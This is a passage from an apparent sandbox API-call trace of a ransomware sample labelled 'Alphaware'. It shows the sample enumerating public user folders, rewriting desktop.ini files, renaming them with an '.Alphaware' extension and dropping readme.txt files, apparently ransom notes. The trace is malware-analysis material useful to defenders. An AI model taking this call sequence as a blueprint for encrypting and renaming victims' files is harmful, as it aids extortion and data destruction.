ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a3d0 [0100.887] FindClose (in: hFindFile=0xd8a3d0 | out: hFindFile=0xd8a3d0) returned 1 [0100.964] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini", dwFileAttributes=0x80) returned 1 [0100.968] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23f6700 | out: lpFileInformation=0x23f6700*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x116)) returned 1 [0100.969] GetFileSize (in: hFile=0x25c, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x116 [0101.113] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0101.113] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x25c [0101.114] GetFileType (hFile=0x25c) returned 0x1 [0101.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0101.114] GetFileType (hFile=0x25c) returned 0x1 [0101.115] WriteFile (in: hFile=0x25c, lpBuffer=0x2474ef8*, nNumberOfBytesToWrite=0x248, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2474ef8*, lpNumberOfBytesWritten=0x23e9f8*=0x248, lpOverlapped=0x0) returned 1 [0101.116] CloseHandle (hObject=0x25c) returned 1 [0101.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0101.118] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8e750f40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x248)) returned 1 [0101.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0101.118] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Documents\\desktop.ini.Alphaware" (normalized: "c:\\users\\public\\documents\\desktop.ini.alphaware")) returned 1 [0101.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0101.123] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\readme.txt" (normalized: "c:\\users\\public\\documents\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x25c [0101.124] GetFileType (hFile=0x25c) returned 0x1 [0101.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0101.124] GetFileType (hFile=0x25c) returned 0x1 [0101.126] WriteFile (in: hFile=0x25c, lpBuffer=0x24782f8*, nNumberOfBytesToWrite=0x49d, lpNumberOfBytesWritten=0x23eae8, lpOverlapped=0x0 | out: lpBuffer=0x24782f8*, lpNumberOfBytesWritten=0x23eae8*=0x49d, lpOverlapped=0x0) returned 1 [0101.127] CloseHandle (hObject=0x25c) returned 1 [0101.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0101.127] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents", nBufferLength=0x105, lpBuffer=0x23e6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents", lpFilePart=0x0) returned 0x19 [0101.128] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*" (normalized: "c:\\users\\public\\documents\\*"), lpFindFileData=0x23e9e0 | out: lpFindFileData=0x23e9e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8e7770a0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8e7770a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a3d0 [0101.128] FindNextFileW (in: hFindFile=0xd8a3d0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8e7770a0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8e7770a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.128] FindNextFileW (in: hFindFile=0xd8a3d0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28697d55, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28697d55, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8e750f40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x248, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="")) returned 1 [0101.128] FindNextFileW (in: hFindFile=0xd8a3d0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0101.128] FindNextFileW (in: hFindFile=0xd8a3d0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0101.129] FindNextFileW (in: hFindFile=0xd8a3d0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0101.129] FindNextFileW (in: hFindFile=0xd8a3d0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e7770a0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8e7770a0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8e7770a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0101.129] FindNextFileW (in: hFindFile=0xd8a3d0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e7770a0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8e7770a0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8e7770a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0101.129] FindClose (in: hFindFile=0xd8a3d0 | out: hFindFile=0xd8a3d0) returned 1 [0101.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0101.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0101.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0101.129] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music", nBufferLength=0x105, lpBuffer=0x23e640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Music", lpFilePart=0x0) returned 0x22 [0101.130] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*" (normalized: "c:\\users\\public\\documents\\my music\\*"), lpFindFileData=0x23e940 | out: lpFindFileData=0x23e940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0101.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0101.133] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0101.133] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures", nBufferLength=0x105, lpBuffer=0x23e640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Pictures", lpFilePart=0x0) returned 0x25 [0101.134] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*" (normalized: "c:\\users\\public\\documents\\my pictures\\*"), lpFindFileData=0x23e940 | out: lpFindFileData=0x23e940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0101.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0101.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0101.135] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos", nBufferLength=0x105, lpBuffer=0x23e640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Documents\\My Videos", lpFilePart=0x0) returned 0x23 [0101.136] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*" (normalized: "c:\\users\\public\\documents\\my videos\\*"), lpFindFileData=0x23e940 | out: lpFindFileData=0x23e940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0101.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0101.137] CoTaskMemAlloc (cb=0x20c) returned 0xd85a10 [0101.138] SHGetFolderPathW (in: hwnd=0x0, csidl=54, hToken=0x0, dwFlags=0x0, pszPath=0xd85a10 | out: pszPath="C:\\Users\\Public\\Pictures") returned 0x0 [0101.139] CoTaskMemFree (pv=0xd85a10) [0101.139] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures", nBufferLength=0x105, lpBuffer=0x23e6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures", lpFilePart=0x0) returned 0x18 [0101.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0101.139] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures", nBufferLength=0x105, lpBuffer=0x23e6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures", lpFilePart=0x0) returned 0x18 [0101.140] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Pictures\\*" (normalized: "c:\\users\\public\\pictures\\*"), lpFindFileData=0x23e9e0 | out: lpFindFileData=0x23e9e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a4f0 [0101.140] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.140] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0101.140] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0101.140] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 0 [0101.141] FindClose (in: hFindFile=0xd8a4f0 | out: hFindFile=0xd8a4f0) returned 1 [0101.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0101.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0101.157] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini", nBufferLength=0x105, lpBuffer=0x23e7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\desktop.ini", lpFilePart=0x0) returned 0x24 [0101.157] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini", dwFileAttributes=0x80) returned 1 [0101.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9f8) returned 1 [0101.158] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x247cc50 | out: lpFileInformation=0x247cc50*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c)) returned 1 [0101.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9a8) returned 1 [0101.158] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini", nBufferLength=0x105, lpBuffer=0x23e570, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Pictures\\desktop.ini", lpFilePart=0x0) returned 0x24 [0101.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea88) returned 1 [0101.159] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x260 [0101.159] GetFileType (hFile=0x260) returned 0x1 [0101.159] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9f8) returned 1 [0101.159] GetFileType (hFile=0x260) returned 0x1 [0101.159] GetFileSize (in: hFile=0x260, lpFileSizeHigh=0x23ec08 | out: lpFileSizeHigh=0x23ec08*=0x0) returned 0x17c [0101.159] ReadFile (in: hFile=0x260, lpBuffer=0x247d000, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23eb38, lpOverlapped=0x0 | out: lpBuffer=0x247d000*, lpNumberOfBytesRead=0x23eb38*=0x17c, lpOverlapped=0x0) returned 1 [0101.160] CloseHandle (hObject=0x260) returned 1 [0101.273] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0101.273] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x260 [0101.274] GetFileType (hFile=0x260) returned 0x1 [0101.275] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e928) returned 1 [0101.275] GetFileType (hFile=0x260) returned 0x1 [0101.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e928) returned 1 [0101.276] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x23ec50 | out: lpFileInformation=0x23ec50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8e8cdd00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2c8)) returned 1 [0101.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0101.276] MoveFileW (lpExistingFileName="C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Pictures\\desktop.ini.Alphaware" (normalized: "c:\\users\\public\\pictures\\desktop.ini.alphaware")) returned 1 [0101.361] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea48) returned 1 [0101.361] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\readme.txt" (normalized: "c:\\users\\public\\pictures\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x260 [0101.362] GetFileType (hFile=0x260) returned 0x1 [0101.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e9b8) returned 1 [0101.362] GetFileType (hFile=0x260) returned 0x1 [0101.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ec38) returned 1 [0101.364] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8e9b2540, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8e9b2540, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.364] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x8e8cdd00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x2c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini.Alphaware", cAlternateFileName="")) returned 1 [0101.364] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e9b2540, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8e9b2540, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8e9b2540, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0101.364] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Pictures", cAlternateFileName="SAMPLE~1")) returned 1 [0101.364] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0101.364] FindClose (in: hFindFile=0xd8a4f0 | out: hFindFile=0xd8a4f0) returned 1 [0101.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0101.364] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0101.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0101.370] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80340916, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.370] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xd6b22, dwReserved0=0x0, dwReserved1=0x0, cFileName="Chrysanthemum.jpg", cAlternateFileName="CHRYSA~1.JPG")) returned 1 [0101.370] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xce875, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desert.jpg", cAlternateFileName="")) returned 1 [0101.371] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x460, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0101.371] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be84d57, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be84d57, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x91554, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hydrangeas.jpg", cAlternateFileName="HYDRAN~1.JPG")) returned 1 [0101.371] FindNextFileW (in: hFindFile=0xd8a4f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8031a7b6, 